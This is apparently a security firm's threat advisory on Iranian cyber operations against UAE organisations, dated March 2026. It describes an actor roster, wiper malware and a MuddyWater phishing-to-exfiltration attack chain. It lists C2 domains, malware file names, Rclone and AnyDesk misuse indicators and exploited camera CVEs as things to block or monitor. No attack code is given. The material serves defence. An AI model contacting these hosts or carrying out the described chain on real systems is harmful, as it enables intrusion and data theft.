Post Now

CyberShelter Emergency Threat Intelligence Update: Escalating Iranian Cyber Operations Targeting UAE Organizations Amid Ongoing Regional Military Conflict

Image

CyberShelter Emergency Threat Intelligence Update: Escalating Iranian Cyber Operations Targeting UAE Organizations Amid Ongoing Regional Military Conflict

CyberShelter threat intelligence analysts are tracking coordinated cyber activity involving Iranian state-aligned APT groups, destructive malware campaigns, and proxy hacktivist operations targeting UAE government, financial, aviation, and infrastructure networks following the escalation of regional hostilities.

Threat Level: CRITICAL
Conflict Status: ACTIVE REGIONAL CONFLICT
Published: 13 March 2026
Version: 1.0 – LIVE ADVISORY
Source: CyberShelter Threat Intelligence & NSOC

Conflict Trigger

On 28 February 2026, the United States and Israel launched coordinated military operations known as Operation Epic Fury / Operation Roaring Lion, targeting Iranian nuclear infrastructure, military leadership, and strategic facilities.

Following these strikes, Iran initiated retaliatory missile, drone, and cyber operations across the Middle East, targeting multiple countries including:

  • United Arab Emirates
  • Bahrain
  • Qatar
  • Kuwait
  • Saudi Arabia
  • Jordan
  • Israel

Cyber operations began simultaneously with kinetic military retaliation, marking the start of an active hybrid conflict environment combining physical warfare and cyber operations.

Situation Overview: UAE Under Active Cyber Targeting

CyberShelter threat intelligence monitoring confirms that UAE organizations are currently within the targeting scope of multiple Iranian cyber actors and affiliated hacktivist groups.

This is not a theoretical risk scenario. Multiple incidents affecting UAE infrastructure have already been observed.

Confirmed Cyber Activity (28 Feb – 13 Mar 2026)

DateIncidentActorImpact28 Feb – 5 MarMissile strike on AWS regional data centersIRGCCloud disruption affecting UAE & Bahrain28 Feb – 2 Mar149 coordinated DDoS attacks across 16 countriesMultiple pro-Iran groupsGovernment, telecom, finance sectors28 FebAbu Dhabi Civil Defense Authority DDoSSylhet GangGovernment service disruptionLate FebUAE airport targeted with DDoSDieNetAviation infrastructure disruptionFeb–MarMass DDoS campaign against Gulf ministries (#Op_Epstein_Gulf)Keymous+UAE government portalsPre-2026Multiple UAE companies compromisedMuddyWaterData exfiltration via exposed C2 infrastructure2024–2026Energy & communications intrusionsAPT33Backdoor deploymentOngoingExploitation of Hikvision/Dahua camerasAgrius / HandalaSurveillance infrastructure targeting

Intelligence Assessment

CyberShelter assesses that UAE organizations are facing a multi-layer cyber threat environment driven by regional conflict escalation.

Three attack layers are currently active:

1. Hacktivist Disruption Operations

  • DDoS attacks
  • Website defacements
  • Psychological influence campaigns

2. Espionage and Network Intrusions

  • MuddyWater implants pre-positioned in networks
  • Credential harvesting and long-term reconnaissance

3. Destructive Cyber Operations

  • Wiper malware
  • ransomware-wiper hybrids
  • infrastructure sabotage attempts

Threat intelligence partners including Cisco Talos, Palo Alto Unit 42, and BeyondTrust assess the next 14–30 days as the highest risk period for escalation.

Why the UAE Is Being Targeted

Iranian cyber strategy targets countries based on geopolitical alignment and strategic impact.

Several factors place UAE organizations in a high-priority targeting category.

Strategic Drivers

Military Alignment

The UAE hosts major U.S. military assets and CENTCOM operations, making it a retaliatory target.

Abraham Accords

UAE normalization with Israel places it within Iran’s perceived regional adversary coalition.

Regional Financial Hub

Disruption of UAE financial infrastructure would create significant geopolitical and economic impact.

Energy Infrastructure

UAE oil and gas infrastructure remains a long-standing target for Iranian cyber actors.

Aviation and Logistics

Airports and logistics hubs are strategic targets capable of disrupting regional supply chains.

Iranian Cyber Threat Ecosystem Targeting the UAE

Iran’s cyber operations involve both state-directed APT groups and affiliated hacktivist proxies.

Key Threat Actors

ActorAffiliationPrimary CapabilityStatusMuddyWaterMOISEspionage & persistence implantsACTIVEAPT33IRGCAerospace & energy targetingELEVATEDAPT34IRGC/MOISCredential theft & web shellsACTIVEAgriusMOISWiper attacksACTIVEVoid Manticore / HandalaMOISWiper campaignsACTIVEPioneer KittenIRGCRansomware + espionageACTIVECyberAv3ngersIRGCICS/OT targetingELEVATEDDieNetHacktivistAviation DDoS attacksACTIVEKeymous+HacktivistGovernment DDoS campaignsACTIVE

Destructive Malware Threats in the Current Conflict

Several destructive malware families associated with Iranian actors are active in the current threat landscape.

ZeroShred Wiper

Associated with Void Manticore / Handala Hack

Capabilities:

  • Large-scale device wipe operations
  • Credential theft using Rhadamanthys infostealer
  • Abuse of Microsoft Intune device management systems

A recent attack wiped over 200,000 managed devices globally using this technique.

Sicarii Ransomware-Wiper

  • Appears as ransomware but destroys decryption keys
  • Victims cannot recover data even if ransom is paid
  • Targeting organizations across the Middle East, Turkey, and Africa

Agrius Pseudo-Ransomware Campaigns

Malware used:

  • DEADWOOD
  • Apostle
  • Fantasy wiper

These attacks disguise destructive malware as ransomware to delay response and create confusion.

Active Campaign: Operation Olalampo (MuddyWater)

CyberShelter monitoring confirms Operation Olalampo, an active MuddyWater campaign targeting organizations across the Middle East including the UAE.

Attack Chain

  1. Spear-phishing emails with malicious Office attachments
  2. Macro-based execution of initial payload
  3. Deployment of GhostFetch downloader
  4. Installation of GhostBackDoor or CHAR backdoor
  5. Persistence using AnyDesk RMM tools
  6. Data exfiltration via Rclone to cloud storage

Newly Observed Malware

MalwareTypeCapabilityGhostFetchDownloaderAnti-analysis evasionGhostBackDoorBackdoorInteractive shellCHARRust malwareTelegram C2HTTP_VIPDownloaderDeploys AnyDeskDinDoorJavaScript backdoorUses Deno runtimeFakeSetPython backdoorCloud-based exfiltration

Key Indicators of Compromise (IOCs)

Organizations should immediately monitor or block the following indicators.

C2 Infrastructure

  • codefusiontech[.]org
  • handala-hack[.]to
  • handala-redwanted[.]to

Malware Indicators

  • FMAPP.dll
  • gshdoc_release_X64_GUI.exe
  • sh.exe

Suspicious Tools

  • Rclone with Wasabi cloud storage
  • Unexpected AnyDesk installations
  • Deno runtime execution

Actively Exploited Vulnerabilities

Iran-linked threat actors are exploiting several known vulnerabilities affecting surveillance devices and enterprise infrastructure.

CVEProductSeverityCVE-2017-7921Hikvision CamerasCriticalCVE-2021-36260Hikvision CamerasCriticalCVE-2023-6895Hikvision CamerasHighCVE-2025-34067Hikvision Security PlatformCriticalCVE-2021-33044Dahua CamerasCritical

Many of these vulnerabilities allow unauthenticated access to live camera feeds or full remote code execution.

Immediate Security Actions for UAE Organizations

Priority 1 (Within 24 Hours)

  • Harden Microsoft Intune administrative access
  • Block known command-and-control infrastructure
  • Disable Office macros from internet sources
  • Audit Hikvision and Dahua surveillance devices
  • Enforce phishing-resistant MFA for administrators

Priority 2 (Within 72 Hours)

  • Verify offline and air-gapped backups
  • Audit remote management tools
  • Patch internet-facing infrastructure
  • Review Intune device enrollment policies

Priority 3 (Within 7 Days)

  • Implement IT / OT network segmentation
  • Conduct destructive attack tabletop exercises
  • Review supply chain exposure
  • Strengthen threat intelligence sharing

CyberShelter Intelligence Assessment

CyberShelter assesses the current cyber threat landscape affecting the UAE as CRITICAL.

The combination of:

  • Active military conflict
  • Iranian cyber retaliation doctrine
  • Pre-positioned espionage implants
  • Hacktivist mobilization
  • destructive malware capability

creates an environment where rapid escalation of cyber attacks is highly likely.

Organizations should transition from passive monitoring to active threat hunting and resilience planning.

Need Immediate Assistance?

CyberShelter NSOC provides 24/7 incident response, threat hunting, and cyber crisis support for organizations facing nation-state cyber threats.

Contact CyberShelter NSOC for emergency support.

Ashif